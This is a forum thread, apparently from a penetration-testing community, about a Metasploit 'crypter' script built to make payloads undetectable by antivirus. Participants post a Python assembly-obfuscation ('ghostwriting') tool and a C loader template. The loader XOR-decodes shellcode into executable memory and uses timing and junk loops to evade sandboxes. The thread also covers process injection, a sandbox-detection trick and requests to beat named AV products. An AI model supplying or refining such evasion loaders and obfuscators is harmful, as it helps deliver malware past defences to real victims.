[script] for AV evasion

[deviney]

Open a new term
Type "dos2unix crypter.py && dos2unix javaAttack.sh" in /opt/metasploit/msf3/
and you're done.

Yer i read that but i thought it would have already be done to the script :/ confusing but owell. Thanks for clearing that up ShadowMaster

[LHYX1]

First off, great script. (BTW if anyone here has any perl coding skills, I'm writing an ASM ghostwriting automation tool in perl. Any help would be appreciated. that should help to make FUD paylaods.)
Second off I get this errror on part two. Also, I'm not entirely sure how to integrate part two into a pentest. All this does is set up the site and java so that when a user browses to my ip from a spoofed DNS response he will be pwned?
[*] Stripping out the debugging symbols...[*] Moving trojan horse to web root...
**************************************
1) apache server
2) java applet attack
3) create evil PDF
**************************************
Select an attack (1-n):2
Traceback (most recent call last):
File "./crypter.py", line 137, in <module>
subprocess.Popen(args=["gnome-terminal", "--command=sh /opt/metasploit/msf3/javaAttack.sh"]).pid
File "/usr/lib/python2.6/subprocess.py", line 633, in __init__
errread, errwrite)
File "/usr/lib/python2.6/subprocess.py", line 1139, in _execute_child
raise child_exception
OSError: [Errno 2] No such file or director


I've been getting this output and trying to debug, but so far I have no idea whatt's causing it. Do you?

You right part 2 isn't really useful in a pentest. I don't do this as a job. It's just a hobby so I didn't really think about that.

As for your error, did you set execution permission for javaAttack.sh and is it in your metasploit directory ?
If you did and it still isn't working maybe changing

Code:

subprocess.Popen(args=["gnome-terminal", "--command=sh /opt/metasploit/msf3/javaAttack.sh"]).pid

to

Code:

subprocess.call('sh javaAttack.sh')

will work.
This is a strange error and you are the first one to have it.

I don't think I will able to help with your ghostwriting tool as I don't know so much about asm and I haven't really done much in perl before.
I'm kind of trying to learn more asm cause I find you need it a lot.

To make my script FUD again I thought to write a c++ program that would call a process in suspend mode and then write the shellcode to the process and resume the process. This is kind of a known method to AV's so I would need to obfuscate my API calls.

I also think that encrypting your shellcode on disk and decrypting it in memory is not good enough anymore. AV sandboxes really step step per step trough your program until they find something. Ghostwriting asm is probably the best option.

Also this seems interesting: http://funoverip.net/2012/06/antivir...evasion-part2/

Any more ideas ?

[ShadowMaster]

So I read that paper, and it was pretty awesome. If you can use that in your script it would be pretty cool. A couple things. 1) Allow for just compiling and placing of the trojan in root. Do not force the listener to be started. In a pentest with phishing, it is annoying to have to cancel the listener every time, instead of continuing down the custom payload path with your executable.

2) when I finally finish my ASM GW script, allowing for default payload obfuscation, integration into your script would be very cool. Do not let this stop you from writing your own, I have several py ghostwriting scripts I can give you to help you get started.

3) My javaAttack.sh is obviously both executable and found in the dir, but even when I change your line to the suggested one it fails with the same error.

4) Have you looked at using different wrappers for the shellcode? usually it's the wrapper that is detected and not the sc. See: http://www.mattandreko.com/2012/02/u...bypass-av.html for several cool examples.

5) Maybe you can have a c/c++ prog inject the shellcode to a running process or something. Again, many methods exist for this.

6) Have you checked out shellcodeexec? You should. You may find it cool.

Let me know what you think of all these.

[LHYX1]

1)I tested the method of connecting to 127.0.0.1:445 to check that your malware is running in a sandbox or not and it worked on avira and some other av's. Altough it doesn't bypass all of them. I know av's don't like socket API's so maybe I'll try to hide them. I'll post the code for this tomorrow. I will allow for just compiling and placing the exe in /root in the next version of the script.

2)Yes it would be really cool to integrate the scripts. Also I would really appreciate it if you would share one of your py GW scripts. I think I could learn a lot from them.

3) Tomorrow I'll take a deeper look at the error. I'll finally have some time to work on the script

4)I'll look into it. Altough I don't really like to use c# for this. You would always need a windows machine to compile.

5)I'll try some different methods and see wich one is the best.

6)I'll also check it tommorow.

[ShadowMaster]

Code:

import random


reg32 = ["EAX", "EBX", "ECX", "EDX", "ESP", "EBP", "ESI" ,"EDI"]
reg16 = [['AL', 'AH'], ['BL', 'BH'], ['CL', 'CH'],[ 'DL', 'DH']]
BitWiseOps = ["And", "Or", "XOr", "Mov"]
StackOps = ["Push", "Pop"]
Xors = [["XOR {DREG}, {DREG}", "MOV {REG}, {DREG}"],
            ["SUB {REG}, {REG}"],
            ["OR {REG}, ffffffffh", "Push {DREG}", "MOV {DREG}, ffffffffh", "SUB {REG}, {DREG}", "Pop {DREG}"],
            ["OR {REG}, ffffffh", "AND {REG}, 55555555h", "AND {REG}, AAAAAAAAh"]]
Movs = [["OR {REG}, ffffffffh", "AND {REG}, {amount}"], ["XOR {REG}, {REG}", "ADD {REG}, {amount}"]]

def GhostWriter():
    file = open(sys.argv[1], 'r')
    fileLines = file.read()
    fileLines = fileLines.splitlines()
    for i in range(len(fileLines)):
        l = fileLines[i]
        if len(l) < 4:
            print "invalid line is less than 5 characters long :" + l
            #break;
        elif l[:1] == "//":
            print "comment line: " + l
        else:
            if l[:3] == 'Pop' or l[:4] == 'Push':
                l = stack(l)
            else :
                l = bitWiseObfuscation(l)
            fileLines[i] = l

    newName = sys.argv[1]#.split('.')
    if len(newName) > 1 : newName = newName.replace(".", "REMADE.", 1)
    else: newName = sys.argv[1] + "REMADE"
    newFile = open(newName, 'w')
    for l in fileLines: newFile.write(l)
    newFile.close()
    print "file saved as: " + newName

def bitWiseObfuscation(l):
    cmds = readCommand(l)
    print cmds
    if len(cmds) == 3:
        if cmds[0].upper() == "XOR" and cmds[1].upper() == cmds[2].upper():
            newRegister = getRandomRegister(cmds[1].upper())
            newCommands = Xors[random.randint(0,3)]
            finalCommand = ""
            for c in newCommands: finalCommand += c + "\n"
            finalCommand = finalCommand.replace('{DREG}', newRegister)
            finalCommand = finalCommand.replace('{REG}', cmds[1].upper())
            finalCommand = finalCommand.replace('{REG}', cmds[1].upper())
            return finalCommand
        elif cmds[0].upper() == "MOV":
            newCommands = Movs[random.randint(0,1)]
            finalCommand = ""
            for c in newCommands: finalCommand += c + "\n"
            finalCommand = finalCommand.replace('{REG}', cmds[1].upper())
            finalCommand = finalCommand.replace('{amount}', cmds[2].upper())
            return finalCommand
    return l + "\n"

def getRandomRegister(register):
    newRegister = reg32[random.randint(0,7)]
    if newRegister != register.upper(): return newRegister
    else: return getRandomRegister(register)

def stack(command):
    return command

def readCommand(command):
    commandParts = command.rsplit()
    for i in range(len(commandParts)):
        if len(commandParts[i]) == 3 and ',' in commandParts[i]:
            commandParts[i] = commandParts[i].replace(',', '')
        elif len(commandParts) == 2 and  ',' in commandParts[i] and i == 1:
            commandParts = [commandParts[0]] + commandParts[1].split(',')
    return commandParts
    
if __name__ == "__main__":
	import sys
	if len(sys.argv) < 2:
            print "please write a path to a file as the first parameter (after the script name)"
	else:
            GhostWriter()

This is one technique, albeit not the one I am using for my perl script. I'll ask the author of the second one for permission to post and if he says yes I will. I look forward to the next version of your script. Edit the first psot and provide a link in the next post as well.

[scorpoin]

nice tool , ive modified loop values to 105000 but yet it is detected by kaspersky , avira , f-secure , bitdefender please have a look to update it so it may bypass all of them. I would say to make it dynamic ghostwriting .

Regards
Scorpoin

[ShadowMaster]

As I've been working on ASM ghostwriting for the past many months, I can tell you this with some authority. To do anything more complicated than xor or static string replacement is *HARD*. THis is not something that'll happen overnight.

[scorpoin]

Thanks for your prompt response. @Shadow and @LHYX1 could you guys please help me out what do I need to change to avoid this detection since it is scantime based not runtime based encryption. @LHYX1 Ive edited your script structure.c to fulfill my need.

Code:

#include <stdlib.h>
#include <stdio.h>
#include <windows.h>
#include <time.h>

int main(){
char junkA []= %s;
unsigned char payload[] = %s;
char junkB []= %s;
unsigned char key = %s;
unsigned int PAYLOAD_LENGTH = %s;
int i;
unsigned char* exec = (unsigned char*)VirtualAlloc(NULL, PAYLOAD_LENGTH/2 ,0x1000,0x40);
unsigned char* unpack = (unsigned char*)VirtualAlloc(NULL, PAYLOAD_LENGTH/2, 0x1000,0x40);
int z, y;
int devide;
int x = 0;
time_t start_time, cur_time;

time(&start_time);
do
{
time(&cur_time);
}
while((cur_time - start_time) < 2);

for(i=0; i<PAYLOAD_LENGTH; i++)
{
devide = %s
if(devide == 0)
{
unpack[x]=payload[i];
x++;
}
}

for(i=0; i<PAYLOAD_LENGTH/2; i++)
{
    for(z=0;z<7000;z++)
    {
        for(y=0;y<700;y++)
        {
                exec[i]=unpack[i]^key;
 }
    }
}

((void (*)())exec)();

return 0;
}

Please share you valuable thoughts and do let me know some guide or something where I can learn more. If possible let me know if possible to make changes to current script. I have not make any changes to cyrpter.py .


Regards
scorpoin

[ShadowMaster]

@LHYX1
Sorry for the thread hijack, but wanted you to check this out: http://www.backtrack-linux.org/forum...ad.php?t=51129

[zimmaro]

@ info:
if anyone hear .. the ""package mingw32"" is the DEFAULT install in BT5-R3!